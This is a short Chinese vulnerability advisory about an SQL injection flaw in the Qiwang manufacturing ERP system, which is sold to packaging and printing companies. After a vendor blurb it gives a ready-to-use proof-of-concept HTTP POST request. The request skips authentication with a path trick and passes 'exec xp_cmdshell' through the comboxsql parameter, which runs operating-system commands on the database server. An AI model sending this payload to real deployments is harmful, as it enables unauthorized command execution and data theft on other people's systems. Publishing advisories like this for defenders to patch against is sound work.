漏洞描述
企望互联网ERP系统融汇行业先进管理理念,凝聚一千多家包装印刷企业管理精华,针对纸箱、纸板、彩箱彩盒、造纸、蜂窝、纸护角、铝箔、纸管、EPS等企业提供专业的管理方案。企望互联网ERP由科技团队潜心专研、开发、拥有自主知识产权。企望科技致力于提高包装印刷企业效率、减少失误,规范管理流程,达到复杂的事情简单化,简单的事情流程化,流程的事情定量化,定量的事情信息化, 终实现企业管理精细化。
企望EDR系统存在sql注入漏洞,攻击者可通过此漏洞获取敏感信息,并能进一步利用获取到系统权限。
企望制造ERP系统 comboxstore SQL注入漏洞
PoC代码
POST /mainFunctions/comboxstore.action;cookieLogin.action HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
comboxsql=exec%20xp_cmdshell%20'whoami'